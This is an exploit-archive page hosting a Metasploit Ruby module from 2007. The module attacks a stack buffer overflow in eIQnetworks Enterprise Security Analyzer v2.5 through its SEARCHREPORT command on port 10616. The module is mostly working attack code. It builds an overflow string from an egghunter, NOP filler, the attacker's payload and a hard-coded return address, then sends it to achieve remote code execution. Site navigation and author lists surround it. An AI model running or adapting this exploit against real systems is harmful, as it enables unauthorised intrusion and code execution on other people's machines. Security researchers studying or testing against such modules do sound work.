eiqnetworks-overflow.pm.txt

eiqnetworks-overflow.pm.txt: Posted Oct 25, 2007; Authored by ri0t; This Metasploit module exploits a stack overflow in eIQnetworks Enterprise Security Analyzer. During the processing of long arguments to the SEARCHREPORT command, a stack-based buffer overflow occurs.; tags | exploit, overflow; SHA-256 | b59fa257c22ba31ed748f5e72a2ac7cb05f08eee76bb554b52471571bc9ca419; Download | Favorite | View

eiqnetworks-overflow.pm.txt

##
# $Id: eiqnetworks_esa.rb 4529 2007-03-12 01:08:18Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'

module Msf

class Exploits::Windows::Misc::Eiqnetworks_SEARCHREPORT < Msf::Exploit::Remote

  include Exploit::Remote::Tcp
  include Exploit::Remote::Egghunter

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'eIQNetworks ESA SEARCHREPORT Overflow',
      'Description'    => %q{
        This module exploits a stack overflow in eIQnetworks
        Enterprise Security Analyzer. During the processing of
        long arguments to the SEARCHREPORT command, a stack-based
        buffer overflow occurs. 
      },
      'Author'         => [ 'ri0t <ri0t[at]ri0tnet.net>',   ],
      'Version'        => '$Revision: 4529 $',
      'References'     => 
        [
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
        },
      'Payload'        =>
        {
          'Space'    => 1962,
          'BadChars' => "\x00",
          'ActiveTimeout' => 15,
        },
      'Platform'       => 'win',
      
      'Targets'        =>
        [
          ['EnterpriseSecurityAnalyzer v2.5 Universal', { 'Ret' => 0x55322a6a, 'Offset' => 1962 } ],  
        
        ],

      'Privileged'     => false,

                        'DisclosureDate' => ''

                        ))

      register_options(
      [
        Opt::RPORT(10616)
      ], self.class)
  end

  def exploit
    connect

    print_status("Trying target #{target.name}...")
  
    hunter = generate_egghunter()
    egg = hunter[1]
    filler =  make_nops(target['Offset'] - payload.encoded.length)
    sploit =  "SEARCHREPORT&" + egg + egg + filler + payload.encoded + make_nops(12) + [target.ret].pack('V') + make_nops(12) + hunter[0] +  "&";
    puts sploit
    sock.put(sploit)
    handler
    disconnect  
  end

end
end

Top Authors In Last 30 Days

Red Hat 232 files
indoushka 159 files
Jay Turla 150 files
Ubuntu 64 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,120)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,142)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,780)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,828)
UNIX (9,454)
UnixWare (188)
Windows (6,766)
Other

eiqnetworks-overflow.pm.txt

eiqnetworks-overflow.pm.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

eiqnetworks-overflow.pm.txt

Share This

eiqnetworks-overflow.pm.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems